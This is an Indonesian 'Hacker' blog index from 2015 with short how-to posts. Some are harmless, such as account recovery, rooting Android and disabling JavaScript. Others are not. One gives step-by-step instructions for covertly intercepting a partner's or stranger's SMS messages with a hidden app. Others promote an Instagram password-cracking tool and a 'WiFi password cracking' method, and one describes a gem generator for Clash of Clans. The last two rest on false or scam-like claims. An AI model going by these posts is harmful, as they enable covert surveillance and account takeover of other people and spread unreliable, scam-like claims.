Hacker

Thursday, 17 December 2015

1 Cara Hancurkan Desktop

22:26 Under From Rambo 007
[1 Comment]
seram sepertinya judulnya,. sebenernya yang dimaksud disini adalah aplikasi/softwere yang di perintahkan untuk membuat suasana baru,.. hmm,.. ya,. munkin sebagian agan bosan dengan tampilan desktopnya dan ingin sesekali mencoba mengacaknya,.. tenang saja,. hal ini tidak berpengaruh fatal,. ini hanya aplikasi yang di buat untuk memberi kesan baru tanpa efek samping,. gak kayak obat batuk di warung sebelah pokoknya dah,.. hahaha,. oke langsung saja di download dibawah ini,..




Download Aplikasinya Disini
Read More »

1 Cara Kembalikan Facebook yang di Hack

22:16 Under From Rambo 007
[1 Comment]
begitu banyak cara dilakukan demi mempromosikan suatu produk ataupun jasa. Tak peduli melalui cara putih ataupun hitam.
Beberapa dari mereka yang menjual jasa ataupun produknya, jelas, ingin jasa atau produk mereka dikenal oleh banyak orang, dan berharap orang-orang yang melihat

produk mereka, mau untuk membelinya.Sebuah laporan yang berasal dari salah satu teman author kami mengatakan, bahwa akun facebooknya telah di bajak. Seseorang telah berhasil meretas akun facebook nya. Dan yang menjadi unik disini, setelah sang peretas berhasil menguasai penuh akun facebook tersebut, mereka ( si peretas/hacker ) memasukkan foto-foto yang merupakan sebuah penawaran iklan. Dan si hacker memposting foto-foto tersebut.

Memang, kejadian seperti itu banyak di alami oleh mereka yang kurang menjaga dan mengamankan akun mereka. Namun untungnya, akun Facebook dari teman author kami tersebut bisa kembali ke tangannya.

Lalu, bagaimana cara mengembalikan akun Facebook yang telah di retas Hacker ?

Berikut tips yang mungkin bisa membantu , Cara Mengembalikan Akun Facebook Yang di Retas :




1. Biasanya, si hacker mengganti password dari akun yang ia bajak, lalu, langkah yang harus Anda ambil adalah segera reset password dari akun Facebook Anda dengan cara menuju ke halaman =>Disini<=

2. Si hacker yang lebih mahir, akan segera dengan cepat mengganti email dari akun Facebook Anda, dengan tujuan untuk segera menghilangkan jejak. Untuk ini, Anda segeralah meminta bantuan dengan mengunjungi link berikut  =>Disini<=

3. Jika akun facebook Anda sudah kembali , segeralah meng-un-install semua app yang ada di akun Facebook Anda. Dan terakhir, periksalah menggunakan antivirus.
  

Itu Beberapa cara yang bisa anda coba, dan berdoalah semoga akuun facebook anda yang diretas orang lain apalgi dissalahgunakan nanti kembali lagi dipangkuan anda, misal anda belum berhasil mungkin anda kurang beruntung hehe'
Demikian , saya hanya berdoa bagi anda semoga berhasil, Terima Kasih
 
Read More »

Sunday, 6 December 2015

1 Cara Sadap Sms Pacar / Orang Lain

00:44 Under From Rambo 007
[1 Comment]
Cara sadap sms yang saya akan bagikan kali ini memang bukan hal baru lagi. namun,mungkin saya para sahabat asap ada yang belum mengetahuinya, jadi saya akan share saja

Download aplikasinya  => DISINI <=

  1. Hp yang di butuhkan harus Hp Symbian (baik HP anda maupun HP korban)
  2. Harus memiliki aplikasy symbian smsanywherelite.sis 

  (nb: Hp korban harus sama mempunyai aplikasi symbian smsanywherelite.sis)



Oke langsung saja kita simak cara sadap Hp berikut ini

  1. Masukkan aplikasi symbian itu di HP anda dan juga di HP calon korban/target. 
  2. Begitu aplikasi ini diinstal, kamu tidak bisa melihat program maupun ikon aplikasi itu dalam ponsel.
    Seluruh pengontrolannya harus lewat sms, mulai dari pengaktifan dan mematikan program, mengubah password, hingga pengiriman sms ke ponsel lain.

    (Inilah keuntungannya jika digunakan sebagai alat sadap. Berarti sang target kan tidak tahu kalau diponselnya telah dipasangi aplikasi tersebut) 
  3. Siapkan hp/ponsel korban anda 
  4. Siapkan HP anda yang akan menerima sms masuk dari korban anda. 
  5. Aktifkan aplikasi ini di ponsel korban kamu dengan mengetik format sms -[ SA(spasi)(password)(spasi)ON ]-. Panjang password maksimal 8 karakter. Misal, jika password kamu adalah 123456, ketikkan SA 123456 ON kirim sms ini ke nomor ponsel kedua/ponsel kamu. Untuk mematikannya, ketik SA 123456 OFF ke nomor yang sama. 
  6. Lalu, jika anda ingin menyadap lebih dari 5 hari..atau setiap sms masuk di hp korban akan selalu diteruskan ke hp anda, ketik sms ini di hp korban anda : SA(spasi)(password)(spasi)R1, misal SA 1234567 R1. Untuk mematikan fungsi ini ganti parameter di belakang “R” menjadi nol. Jadi, tuliskan SA 1234567 R0. Sedangkan untuk meneruskan setiap sms keluar, kirim sms bertuliskan SA 1234567 S1 ke nomer kamu. Matikan fungsi ini dengan mengirim SMS SA 1234567 S0 
  7. Sekarang, setiap korban menerima dan mengirim sms..kamu akan mendapat terusannya sama persis dengan sms aslinya. 
Read More »

290 Cara Hack account Instagram dengan softwere Terbaru 2015

00:06 Under From Rambo 007
[290 Comment]
baik gan,.. kali ini awan akan berbagi aplikasi hacked instagram, sebelum dimulai mohon dibaca baik-baik,.. penggunaan aplikasi adalah dengan menyangkutkan pada pihak ketiga,. jadi da

lam hal ini sahabat di harapkan untuk tetap berhati-hati agar tidak terjadi hal yg merugikan bagi orang lain ataupun sahabat sendiri,.. disini awan cuma berusaha buat offer aja ya,. meskipun awan pribadi kurang menganjurkan mengingat akan mungkin ada pihak yang dirugikan

nah yang pertama dilakukan adalah download aplikasinya => DISINI <=

1. Download Aplikasi Instagram Hack

2. Kemudian Buka aplikasinya dan klik “Install This Application”

3. Setelah itu lanjutkan dengan terus mengklik “Next” Sampai Aplikasi selesai diinstall. Proses Instalasi sekitar 4 menit.

4. Selesai Aplikasi Instagram Hack sudah berhasil anda install.

Setelah mengikuti proses instalasi dan sudah selesai instalasinya kita kembali ke tutorial. Tutorial nya sebagai berikut :

  • Anda Buka Aplikasi Instagram Hack tadi yang sudah selesai anda Install.
  • Anda Masukkan ID (Username) instagram yang ingin diretas tanpa menggunakan tanda/simblo “@” . Langsung saja anda tulis Username nya.
  • Setelah itu anda klik “Start Recovery Password” Atau “Crack Password”
  • Lalu tunggu prosesnya sekitar 5 menit saja.
  • Dan akan muncul password beserta data-data akun korban :)
untuk activatornya silahkan tinggalkan alamat yang bisa di hubungi,. email / facebook di komentar,.. secepatnya saya kirimkan activatornya,.. hal ini untuk melindungi dari pencurian ya gan 
Read More »

Saturday, 5 December 2015

0 Cara Melacak Lokasi Seseorang melalui Nomor HP

05:07 Under From Rambo 007
[0 Comment]
Jika Anda Terkena Teror SMS ataupun telp dari nomor yang tidak dikenal??
Atau mungkin anda ingin mencari adik, pacar, istri dan selingkuhan anda yang hilang?? jangan tergesa-gesa lapor polisi dulu karena anda bisa melacak keberadaanya melalui nomor handphone-nya.

ada sebuah situs yang memiliki fasilitas melacak lokasi nomor handphone Lacak Lokasi HP

1. Kunjungi situs Lacak Lokasi HP

2. Kemudian masukkan nomor HP yang anda ingin  anda lacak pada kotak PSTN

3. Kemudian klik tombol Search untuk memulai pelacakan






4. Lihatlah Nomor yang saya lacak ternyata di Banyuwangi


NB: Lokasi pencarian berdasarkan lokasi penerbitan nomor, bukan lokasi sebenarnya. Mohon baca penjelasan dibawah.
Read More »

Friday, 4 December 2015

1 Cara Mudah Root Android tanpa PC Terbaru Desember 2015

22:16 Under From Rambo 007
[1 Comment]
Kali ini Saya Akan Berbagi Cara nya Untuk Melakukan Root Di ANDROID 2015

Tanpa Pc/Laptop

Apa Sih Root itu..???

Root Adalah Memberikan Akses Penuh Kepada Pengguna Android

Dan Hasil Tampilan nya Nanti Jauh Lebih Bagus Android Yg Sudah Di Root Daripada Yg Belum Di Root

Namun Sebelum Kita Melakukan Root Ada Baik nya Kita Mengetahui Resiko nya

Resiko Android Yg Sudah Di Root Adalah Kita Bisa Kehilangan Garansi Resmi

dan Juga Menyebabkan Kerusakan Hp Apabila Terjadi Kegagalan Saat Proses Root Sedang Di Lakukan Namun ini Sangat Jarang Terjadi

Yukk Langsung Menuju Tutorial Cara Root Android Bisa Untuk Semua Versi






1. Download Aplikasi nya => KLIK DISINI <=

2. Instal Dan Buka Aplikasi nya

3. Tekan Gambar Lingkaran Root

4. Tunggu Proses Root Sampai Selesai ( Jangan Sampai Hp nya Mati Ke Habisan Batrei )

5. Jika Root Behasil Nanti Akan Muncul Gambar Jempol Di Lingkaran Root

Sekian Tips Dan Trik Cara Root Hp Android
Semoga Bermanfaat

Read More »

0 Cara Merubah Bahasa Facebook ke Bahasa ALay

22:06 Under From Rambo 007
[0 Comment]
Pada Postingan Kali ini Sya Akan Berbagi Tips Dan Trik Seputar Facebook Yaitu Cara Merubah Tulisan / Bahasa Facebook Yg Kita Gunakan Menjadi Tulisan / Bahasa ALAY
Setelah Saya Telusuri Ternyata Di Facebook Bisa Merubah Bahasa Yg Bisa Kita Gunakan Menjadi Bahasa Anak ALAY
Bahasa Alay Ternyata Cukup Terkenal Tidak Hanya Ada Di Indonesia Akan Tetapi Sampai Di Luar Negri Pun Ada Bahasa ALAY
Oke Dah Berikut ini Cara Merubah Bahasa Facebook ke Bahasa Alay


1. Login / Masuk Dulu Ke Akun FB mu
2. Buka Pengaturan Akun / Setting
3. Pilih Bahasa
4. Ganti Bahasa Yg Kalian Gunakan Menjadi Leet Speake

Untuk Lebih Jelas nya Lihat Gambar Dibawah ini





Nah itu Tadi Cara Merubah Bahasa Facebook Ke Bahasa Alay
Semoga Bermanfaat
Read More »

Wednesday, 2 December 2015

0 Cheat Coc (clash of clans) tanpa Root Androd

23:16 Under From Rambo 007
[0 Comment]
Butuh cheat coc tanpa root hp? Ya banyak kok yang seperti anda, sudah capek2 maen game android Clash of Clans ini tapi ga kelar2, yang ada bukannya mengurangi stres dengan main games, eee malah jadi frustasi karena penasaran kalah melulu, solusinya ya pakai Cheat Coc biar cepet menang dan ganti game android yang lain. Tapi rata2 cheat game android itu perlu root hp android kita, nah buat anda yang mau cheat coc tanpa root hp android anda, anda bisa mengikuti cara yang ada disini..

Coc Cheat yang gendruk sampaikan di halaman ini adalah berupa tool online yang dapat menggenerate ribuan gems, gold maupun elixir sebanyak yang anda mau. Memang banyak yang meragukan kalau ngecheat coc pakai tool online ini bakalan beneran menambah jumlah gems, gold maupun elixir sampai ribuan jumlahnya ke akun clash of clans kita. Namun kalau dari komen-komen yang saya baca di tool ini hampir semuanya positif berhasil mendapatkan apa yang mereka mau.  Nah apa anda penasaran seperti apa dan bagaimana cara menggunakan cheat clash of clans ini? Simak terus sampai selesai halaman ini.






Cheat Coc Tanpa Root Hp Android

 

Okelah, ga usah banyak basa-basi, buat anda yang mau tahu cara cheat COC tanpa root HP android dan juga IOS anda silakan saja anda ikuti langkah2 mudahnya berikut ini yah. Pastikan anda mengikuti langkah disini dengan benar, dan ikuti semua instruksi yang diberikan oleh online tool yang bersangkutan agar tool online ini bekerja dengan baik dan sukses…

1. Anda pergi saja ke online Clash Of Clans (COC) Hack Tool di Sini.

2. Kemudiang anda harus Masukkan Username Clash of Clans anda, jangan sampai salah ketik.

3. Masukkan Jumlah Gold, Gems, Elixir yang mau anda tambahkan.

4. Klik Generate

5. Tunggu prosesnya beberapa saat

6. Dan taraa…selesai, Gems, Gold dan elixir hasil generate anda sudah bisa diambil.

Gampang bukan? Silakan coba saja sendiri tips dan cara Cheat COC tanpa Root HP diatas, semoga berhasil. Nah kalau anda memang berhasil sukses mendapatkan ribuan gems coc gratis setelah menggunakan tool ini, jangan lupa share ke temen-temennya yang juga hobinya main game ini yah, biar mereka juga merasakan enaknya dapat clash of clans gems, gold dan elixir gratis. Oya klo sekiranya ternyata tool ini sudah anda coba dan belum berhasil walau sudah coba berkali2, anda bisa coba cara lain, yaitu dengan menggunakan aplikasi android penghasil uang, nah uang hasil jerih payah anda itu yang biasanya berbentuk dollar, anda tukarkan dengan gems, elixir atau Gold. Terima Kasih.
Read More »

0 Cara Membobol Password Wifi dengan Software

06:52 Under From Rambo 007
[0 Comment]
Oke sahabat semua,,,kita ketemu lagi, kali ini saya akan share cara membobol password wifi
Jika saat asik sedang duduk di sekolah, di mall, di kampus bahkan di alun-alun atau pun RTH, banyak kita jumpai area wifi yang dapat digunakan untuk internet-an. akan tetapi, kebanyakan fasilitas wifi tersebut sering kali di password....
Bagi anda yang tidak tahu passwordnya tidak boleh bersedih hati karena pada tutorial kali ini, saya akan menunjukan cara mudah mengintip password wifi. yah... hanya dengan menggunakan sebuah software kecil yang bernama Wireless key view, maka anda sudah dapat melihat password pada wifi yang terdeteksi.

Download Aplikasinya => DISINI <=

1. Pada contoh berikut ini, saya ingin menggunakan koneksi wifi yang bernama "RUMAH IDAMAN"


2. Tapi alangkah sedihnya, saat muncul kotak dialog meminta password seperti gambar berikut

3. Saya yakin anda juga pasti sering mengalami hal seperti ini. sangat menjengkelkan sekali kan....!


4. Oke... karena saya tidak tahu passwordnya apa, maka terpaksa saya bobol saja..

5. Extrak dulu aplikasi yang sudah anda download tadi. jika sudah jalankan aplikasi wireless key view.

6. Tunggulah beberapa saat dan taraaaaaaaaa...!!! saya sudah berhasil mendapatkan passwordnya.

7. Password bisa anda lihat pada bagian key (ascii)

8. Sekarang masukan password tersebut dan silahkan ber-internet ria.


 Gimanaaaaa....?? Mantab toooooh....!!!
 

Read More »

Tuesday, 1 December 2015

0 Cara Internetan Gratis Terbaru 2015

20:09 Under From Rambo 007
[0 Comment]
Untuk memakai web di Android anda juga pasti harus membeli paket web seperti Paket Internet Axis dan Paket Internet Bolt atau Smartfren. Dan tentunya anda diwajibkan membayar dan akan mengeluarkan uang jajan. Kecuali jika anda memanfaatkan Cara Mendapatkan Pulsa Gratis yang sudah saya persiapkan sebelumnya, silahkan dibaca saja.

Untuk mengatasi hal diatas, pada artikel ini sudah saya buatkan trik web free buat android yang bisa kita nikmati 100% secara complimentary dan full speed. Web Gratis Android yang saya bagikan kali ini pastinya work untuk semua administrator. Namun yang sudah saya coba masih pada cell phone android gsm, yang cdma belum. jadi silahkan di coba sendiri untuk cdma heheheheee. 




Trik Internet Gratis Android

Pada web free kali ini kita menggunakan Aplikasi VPN atau Virtual Private Network, untuk lebih lanjutnya langsung simak caranya dibawah ini:

1. Siapkan Hp Android

2. Download Aplikasi Conecting Internet nya => KLIK DISINI <=

3. Introduce Dan Buka Aplikasi Yg Sudah Di Download Tadi Di Hp Android mu

4. Setelah Aplikasi Terbuka Sobat Ketik Di Pencarian dgn kata kunci Trik Internet Gratis 2015 All Operator
5. Nanti Akan Muncul Aplikasi nya Bergambar Hp Android Sobat Klik Aplikasi Tersebut

6. Lalu Klik Connect Dan Pilih Operator Kartu Yg Kalian Gunakan

7. Bila Sudah Connect Aplikasi Jangan Di Tutup Ketika Sedang Browsing Jadi Di Minimize Aja

Selesai dahhh 

Selamat Ber Selancar Di Dunia Maya Tanpa Pulsa 
Sekian Artikel Tips Dan Trik Yg Bisa Saya Bagikan Semoga Bermanfaat.
Read More »

0 Cara Membobol Proteksi Klik Kanan & Anti Copy Paste pada Website

03:22 Under From Rambo 007
[0 Comment]
Sudah capek capek searching di google, akhirnya menemukan situs dengan konten (artikel) yang kita inginkan. Alangkah sedihnya saat mencoba copy konten tersebut, tiba-tiba muncul pesan "maaf ya klik kanan dilarang," "dilarang copy paste bro....", atau klik kanan tidak muncul sama sekali. pernah nggak pembaca sekalian mengalami kejadian tragis seperti itu.

Oke... trik kali ini saya akan menunjukan cara membobol proteksi klik kanan pada Website yang pelit seperti itu. Berikit ini caranya:

1. Apabila anda menggunakan google chrome, maka silahkan klik toolbar sesuaikan dan kontrol google chrome yang berada di pjok kanan atas


2. Pilih Setelan dan klik Tampilan setelan lanjutan.


3. Cari pada bagian privasi.

4. Kemudian klik setelan konten.

5. Maka akan muncul kotak dialog.

6. Tepatnya pada bagian Javascript silahkan pilih " Jangan izinkan situs apa pun menjalankan Javascript".

7. Selanjutnya klik selesai


8. Demikian cara mematikan fungsi Javascript pada google chrome.

9. Sekarang silahkan anda coba paste atau klik kanan pada website yang tadinya diproteksi, pasti sudah bisa.

10. Apabila anda menggunakan mozilla firefox maka silahkan klik menu Firefox > Options > Options.

11. Pada kotak dialog, klik tab Content kemudian hilangkan ceklis pada bagian Enable Javascript.

12. Jika sudah klik OK.

13. Sekarang coba anda copy-paste atau klik kanan pada website yang tadinya diproteksi, sudah bisa toooh...

Baca juga Cara Mengetahui Informasi Pemilik Website
Read More »